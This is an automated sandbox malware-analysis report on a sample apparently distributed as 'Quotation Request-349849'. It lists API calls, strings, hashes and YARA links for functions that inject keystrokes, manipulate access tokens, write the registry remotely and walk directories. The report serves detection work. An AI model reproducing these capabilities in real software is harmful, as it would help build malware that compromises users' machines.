                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: LongNamePath_memmove
                                                      • String ID:
                                                      • API String ID: 2514874351-0
                                                      • Opcode ID: 87a104672cd195426ae3a5d625981938ec6186864f72e93a9f71d6beb2b20f0a
                                                      • Instruction ID: 05c62e28cbb162be53638b890ebfaa99eddac8b6e14cf657b4bd922f6c7e48ea
                                                      • Opcode Fuzzy Hash: 87a104672cd195426ae3a5d625981938ec6186864f72e93a9f71d6beb2b20f0a
                                                      • Instruction Fuzzy Hash: 42E0867690422857C720A6689C09FEA77EDEF887A1F0441B6FD0CD7245D9649C808691
                                                      Function 007F525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __wfsopen
                                                      • String ID:
                                                      • API String ID: 197181222-0
                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                      • Instruction ID: 1154f6df7036aefbd2a944a030eb32af77ae0be763951e4404f881d1a3aa6a75
                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                      • Instruction Fuzzy Hash: 2FB092B644020CB7CE012A82FC02A593F19AB41764F408020FB0C18262A677A6649A89
                                                      Function 015EB538 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNELBASE(000001F4), ref: 015EB549
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1334107479.00000000015E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 015E9000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_15e9000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction ID: 86212927a8ce517abbeda3d796cde6b0ec606b295514661a235595e98f23dbb8
                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction Fuzzy Hash: B1E0BF7494020D9FDB00DFA4D5496AD7BB4EF04302F100161FD0192290D6309A508A62

                                                      Non-executed Functions

                                                      Function 0085CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623
                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0085CB37
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0085CB95
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0085CBD6
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0085CC00
                                                      • SendMessageW.USER32 ref: 0085CC29
                                                      • _wcsncpy.LIBCMT ref: 0085CC95
                                                      • GetKeyState.USER32(00000011), ref: 0085CCB6
                                                      • GetKeyState.USER32(00000009), ref: 0085CCC3
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0085CCD9
                                                      • GetKeyState.USER32(00000010), ref: 0085CCE3
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0085CD0C
                                                      • SendMessageW.USER32 ref: 0085CD33
                                                      • SendMessageW.USER32(?,00001030,?,0085B348), ref: 0085CE37
                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0085CE4D
                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0085CE60
                                                      • SetCapture.USER32(?), ref: 0085CE69
                                                      • ClientToScreen.USER32(?,?), ref: 0085CECE
                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0085CEDB
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0085CEF5
                                                      • ReleaseCapture.USER32 ref: 0085CF00
                                                      • GetCursorPos.USER32(?), ref: 0085CF3A
                                                      • ScreenToClient.USER32(?,?), ref: 0085CF47
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0085CFA3
                                                      • SendMessageW.USER32 ref: 0085CFD1
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0085D00E
                                                      • SendMessageW.USER32 ref: 0085D03D
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0085D05E
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0085D06D
                                                      • GetCursorPos.USER32(?), ref: 0085D08D
                                                      • ScreenToClient.USER32(?,?), ref: 0085D09A
                                                      • GetParent.USER32(?), ref: 0085D0BA
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0085D123
                                                      • SendMessageW.USER32 ref: 0085D154
                                                      • ClientToScreen.USER32(?,?), ref: 0085D1B2
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0085D1E2
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0085D20C
                                                      • SendMessageW.USER32 ref: 0085D22F
                                                      • ClientToScreen.USER32(?,?), ref: 0085D281
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0085D2B5
                                                        • Part of subcall function 007D25DB: GetWindowLongW.USER32(?,000000EB), ref: 007D25EC
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0085D351
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                      • String ID: @GUI_DRAGID$F
                                                      • API String ID: 3977979337-4164748364
                                                      • Opcode ID: 231ee713eac0faf73046223c4a12c7d309347cf0af424b1d157ddefb8b56d6b5
                                                      • Instruction ID: 37f7330f71d932fc2aef24ee46762a7af4fb4b1107a988832ed255f964eff13f
                                                      • Opcode Fuzzy Hash: 231ee713eac0faf73046223c4a12c7d309347cf0af424b1d157ddefb8b56d6b5
                                                      • Instruction Fuzzy Hash: F642AD74204341AFDB21DF28C848AAABBE5FF48322F140529FA95D72B1D731D859DF52
                                                      Function 007E6F9E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5018COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove$_memset
                                                      • String ID: 3c~$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_~
                                                      • API String ID: 1357608183-3618157465
                                                      • Opcode ID: c7c8df7d7413c1bae553b6c8c9210319e47e7e9aec7da8459854116f7657436c
                                                      • Instruction ID: c88e12a3281e53066c39374b035d0c55c3f5153ff86c9c282e76b8a8a132bc68
                                                      • Opcode Fuzzy Hash: c7c8df7d7413c1bae553b6c8c9210319e47e7e9aec7da8459854116f7657436c
                                                      • Instruction Fuzzy Hash: 4F93B275A00229DFDB28CF58D891BADB7B1FF48310F25816AE945EB281E7749EC1CB50
                                                      Function 007D48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32(00000000,?), ref: 007D48DF
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0080D665
                                                      • IsIconic.USER32(?), ref: 0080D66E
                                                      • ShowWindow.USER32(?,00000009), ref: 0080D67B
                                                      • SetForegroundWindow.USER32(?), ref: 0080D685
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0080D69B
                                                      • GetCurrentThreadId.KERNEL32 ref: 0080D6A2
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0080D6AE
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0080D6BF
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0080D6C7
                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 0080D6CF
                                                      • SetForegroundWindow.USER32(?), ref: 0080D6D2
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0080D6E7
                                                      • keybd_event.USER32(00000012,00000000), ref: 0080D6F2
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0080D6FC
                                                      • keybd_event.USER32(00000012,00000000), ref: 0080D701
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0080D70A
                                                      • keybd_event.USER32(00000012,00000000), ref: 0080D70F
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0080D719
                                                      • keybd_event.USER32(00000012,00000000), ref: 0080D71E
                                                      • SetForegroundWindow.USER32(?), ref: 0080D721
                                                      • AttachThreadInput.USER32(?,?,00000000), ref: 0080D748
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 4125248594-2988720461
                                                      • Opcode ID: f78d54a2bd0fd69f3439e098a369be388ed46114057aa021bd242802e4668378
                                                      • Instruction ID: c137567c80b8c5c78139e24f9481e34a42f713cba0249f927efc7ad217a75f4d
                                                      • Opcode Fuzzy Hash: f78d54a2bd0fd69f3439e098a369be388ed46114057aa021bd242802e4668378
                                                      • Instruction Fuzzy Hash: 03319271A40318BBEB202BA18C4AF7F3E6CFB44B51F104025FB05EB1D2D6B45900ABA0
                                                      Function 00828310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 008287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0082882B
                                                        • Part of subcall function 008287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00828858
                                                        • Part of subcall function 008287E1: GetLastError.KERNEL32 ref: 00828865
                                                      • _memset.LIBCMT ref: 00828353
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008283A5
                                                      • CloseHandle.KERNEL32(?), ref: 008283B6
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008283CD
                                                      • GetProcessWindowStation.USER32 ref: 008283E6
                                                      • SetProcessWindowStation.USER32(00000000), ref: 008283F0
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0082840A
                                                        • Part of subcall function 008281CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00828309), ref: 008281E0
                                                        • Part of subcall function 008281CB: CloseHandle.KERNEL32(?,?,00828309), ref: 008281F2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                      • String ID: $default$winsta0
                                                      • API String ID: 2063423040-1027155976
                                                      • Opcode ID: 26fe6f6085d4854d53ec82c96d4be32cb11a1eb61edcb6a1fa9aba51aeeb373e
                                                      • Instruction ID: dba8c57185ae5201972c2caad1064bf6d39432ce6b7a402d88904087b871e70b
                                                      • Opcode Fuzzy Hash: 26fe6f6085d4854d53ec82c96d4be32cb11a1eb61edcb6a1fa9aba51aeeb373e
                                                      • Instruction Fuzzy Hash: C9817971902219EFDF119FA4ED49AEEBBB8FF08304F144169F910E2261DB358E94DB20
                                                      Function 0083C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0083C78D
                                                      • FindClose.KERNEL32(00000000), ref: 0083C7E1
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0083C806
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0083C81D
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0083C844
                                                      • __swprintf.LIBCMT ref: 0083C890
                                                      • __swprintf.LIBCMT ref: 0083C8D3
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                      • __swprintf.LIBCMT ref: 0083C927
                                                        • Part of subcall function 007F3698: __woutput_l.LIBCMT ref: 007F36F1
                                                      • __swprintf.LIBCMT ref: 0083C975
                                                        • Part of subcall function 007F3698: __flsbuf.LIBCMT ref: 007F3713
                                                        • Part of subcall function 007F3698: __flsbuf.LIBCMT ref: 007F372B
                                                      • __swprintf.LIBCMT ref: 0083C9C4
                                                      • __swprintf.LIBCMT ref: 0083CA13
                                                      • __swprintf.LIBCMT ref: 0083CA62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                      • API String ID: 3953360268-2428617273
                                                      • Opcode ID: 7afc2af326edb23bc02c8595e8c6930f44ca1382e9fc8255e8bcb1cc5cc68460
                                                      • Instruction ID: 7b2e4731b13cf2148f67fe347968f3452d7ea453e535658d71d9209189cfd29d
                                                      • Opcode Fuzzy Hash: 7afc2af326edb23bc02c8595e8c6930f44ca1382e9fc8255e8bcb1cc5cc68460
                                                      • Instruction Fuzzy Hash: B8A1FEB1504344EBC754EB94C889DAFB7FCFF94704F40492AF695D6251EA38EA08CB62
                                                      Function 0083EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0083EFB6
                                                      • _wcscmp.LIBCMT ref: 0083EFCB
                                                      • _wcscmp.LIBCMT ref: 0083EFE2
                                                      • GetFileAttributesW.KERNEL32(?), ref: 0083EFF4
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 0083F00E
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0083F026
                                                      • FindClose.KERNEL32(00000000), ref: 0083F031
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0083F04D
                                                      • _wcscmp.LIBCMT ref: 0083F074
                                                      • _wcscmp.LIBCMT ref: 0083F08B
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0083F09D
                                                      • SetCurrentDirectoryW.KERNEL32(00888920), ref: 0083F0BB
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0083F0C5
                                                      • FindClose.KERNEL32(00000000), ref: 0083F0D2
                                                      • FindClose.KERNEL32(00000000), ref: 0083F0E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1803514871-438819550
                                                      • Opcode ID: c48c346789ecf3afb5136dc2705b158aba2c5c085c920246fd8fc17c671849df
                                                      • Instruction ID: 87006ca3c9dd2d08ea346164f78a38c1cf340468701aa45ffa5f132cf179aacb
                                                      • Opcode Fuzzy Hash: c48c346789ecf3afb5136dc2705b158aba2c5c085c920246fd8fc17c671849df
                                                      • Instruction Fuzzy Hash: 1E31EB72901608ABDB14ABB4DC58AEE77ACFF84361F100175FA14D31A2DB78DA44CF91
                                                      Function 00850857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00850953
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0085F910,00000000,?,00000000,?,?), ref: 008509C1
                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00850A09
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00850A92
                                                      • RegCloseKey.ADVAPI32(?), ref: 00850DB2
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00850DBF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectCreateRegistryValue
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 536824911-966354055
                                                      • Opcode ID: 7335f93524527879b024d3be37bbd5a28d0c302b13c61542350e16ea654ced49
                                                      • Instruction ID: 2dd7698b2a57bb11a9413bd80bb7e86a79f666c7ee444f7646feb41bbe0fc5e7
                                                      • Opcode Fuzzy Hash: 7335f93524527879b024d3be37bbd5a28d0c302b13c61542350e16ea654ced49
                                                      • Instruction Fuzzy Hash: FE023575600601DFCB14EF28C859A2AB7F5FF89714F048959F99A9B3A2DB34EC05CB81
                                                      Function 0083F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0083F113
                                                      • _wcscmp.LIBCMT ref: 0083F128
                                                      • _wcscmp.LIBCMT ref: 0083F13F
                                                        • Part of subcall function 00834385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008343A0
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0083F16E
                                                      • FindClose.KERNEL32(00000000), ref: 0083F179
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0083F195
                                                      • _wcscmp.LIBCMT ref: 0083F1BC
                                                      • _wcscmp.LIBCMT ref: 0083F1D3
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0083F1E5
                                                      • SetCurrentDirectoryW.KERNEL32(00888920), ref: 0083F203
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0083F20D
                                                      • FindClose.KERNEL32(00000000), ref: 0083F21A
                                                      • FindClose.KERNEL32(00000000), ref: 0083F22C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 1824444939-438819550
                                                      • Opcode ID: febd3aecd20a20282045e3b29d3c71d3f96f8ab35596c6c455a21510f5cde600
                                                      • Instruction ID: 616ce81415e9b0a7d4db7d595de04c2a8a6a1a51cf50ce1daa69ccc98b6e4b92
                                                      • Opcode Fuzzy Hash: febd3aecd20a20282045e3b29d3c71d3f96f8ab35596c6c455a21510f5cde600
                                                      • Instruction Fuzzy Hash: F531A47690021DAADB10AB64EC59EEF77ACFF85361F100175FA10E32A2DB34DA45CAD4
                                                      Function 0083A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0083A20F
                                                      • __swprintf.LIBCMT ref: 0083A231
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0083A26E
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0083A293
                                                      • _memset.LIBCMT ref: 0083A2B2
                                                      • _wcsncpy.LIBCMT ref: 0083A2EE
                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0083A323
                                                      • CloseHandle.KERNEL32(00000000), ref: 0083A32E
                                                      • RemoveDirectoryW.KERNEL32(?), ref: 0083A337
                                                      • CloseHandle.KERNEL32(00000000), ref: 0083A341
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                      • String ID: :$\$\??\%s
                                                      • API String ID: 2733774712-3457252023
                                                      • Opcode ID: 02f632aa0cf1ba391b061a4f351b900932846f5abcf75f8ff051d5038666b4e5
                                                      • Instruction ID: a527baa65f7d92ce4dd0ea8c0308dd9823a3c206b4c0f9ebe280d74399af3eab
                                                      • Opcode Fuzzy Hash: 02f632aa0cf1ba391b061a4f351b900932846f5abcf75f8ff051d5038666b4e5
                                                      • Instruction Fuzzy Hash: 7D31D2B1900209ABDB21DFA0DC49FEB37BCFF89701F1041B6F608D6261EB7496448B65
                                                      Function 00827CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00828202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0082821E
                                                        • Part of subcall function 00828202: GetLastError.KERNEL32(?,00827CE2,?,?,?), ref: 00828228
                                                        • Part of subcall function 00828202: GetProcessHeap.KERNEL32(00000008,?,?,00827CE2,?,?,?), ref: 00828237
                                                        • Part of subcall function 00828202: HeapAlloc.KERNEL32(00000000,?,00827CE2,?,?,?), ref: 0082823E
                                                        • Part of subcall function 00828202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00828255
                                                        • Part of subcall function 0082829F: GetProcessHeap.KERNEL32(00000008,00827CF8,00000000,00000000,?,00827CF8,?), ref: 008282AB
                                                        • Part of subcall function 0082829F: HeapAlloc.KERNEL32(00000000,?,00827CF8,?), ref: 008282B2
